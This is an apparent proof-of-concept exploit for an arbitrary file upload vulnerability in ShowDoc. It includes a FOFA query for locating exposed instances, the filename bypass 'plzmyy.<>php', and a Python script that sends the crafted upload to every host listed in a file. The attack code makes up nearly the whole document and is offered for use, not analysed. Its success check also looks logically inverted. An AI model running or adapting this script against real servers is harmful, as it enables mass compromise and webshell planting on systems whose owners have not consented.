FOFA:
app="ShowDoc"
PoC:
POST /server/index.php?s=/home/page/uploading HTTP/1.1
上传图片,并抓包,将文件名改为plzmyy.<>php
import requests
requests.packages.urllib3.disable_warnings()
test = open('url.txt',"r")
for host in test.readlines():
url = host+"/server/index.php?s=/home/page/uploading"
payload = """------WebKitFormBoundary5j2IsrTFPjJCVtwU
Content - Disposition: form - data;name = "editormd-image-file";filename = "plzmyy.<>php"
Content - Type: text / plain
123123test
------WebKitFormBoundary5j2IsrTFPjJCVtwU - -"""
headers = {
"Cookie": "PHPSESSID=shp3gipo9moaj58kp9n8sbi4f1; think_language=zh-CN; cookie_token=8ff04b9bba8b6abf30ab5e0be6cceea2192c9cf7a90d73b2d34d025d84feea2d",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Connection": "close",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Dest": "iframe",
"Accept-Encoding": "gzip, deflate",
"Sec-Fetch-Mode": "navigate",
"sec-ch-ua": "\"Google Chrome\";v=\"87\", \" Not;A Brand\";v=\"99\", \"Chromium\";v=\"87\"",
"sec-ch-ua-mobile": "?0",
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Content-Length": "212",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary5j2IsrTFPjJCVtwU"
}
try:
response = requests.request("POST", url, data=payload, headers=headers, verify=False, timeout=5)
except:
continue
if response.text in 'success':
print(response.text)ref: